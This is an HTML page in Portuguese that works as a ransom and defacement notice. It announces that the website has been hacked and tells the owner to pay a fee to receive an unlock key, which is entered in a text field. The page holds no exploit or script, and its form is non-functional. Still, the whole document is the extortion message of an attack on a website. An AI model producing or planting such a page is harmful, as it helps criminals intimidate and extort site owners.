<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Site comprometido</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      text-align: center;
      height: 90vh;
      align-items: center;
      display: flex;
      background-color: gray;
    }

    .maintenance-message {
      background-color: #000;
      padding: 20px;
      border-radius: 8px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
      max-width: 400px;
      margin: auto auto;
      color: white;
    }

    .discord-link {
      color: #3498db;
      text-decoration: none;
      font-weight: bold;
    }
  </style>
</head>
<body>

  <div class="maintenance-message">
    <h1 style="color: red">ESTE SITE FOI HACKEADO!</h1>
    <p>Se você for o dono, pague uma taxa para ser liberado e enviaremos a chave.</p>
    <form>
      <input method="get" type="text" placeholder="Chave de desbloqueio">
      <button>Desbloquear</button>
    </form>
  </div>

</body>
</html>
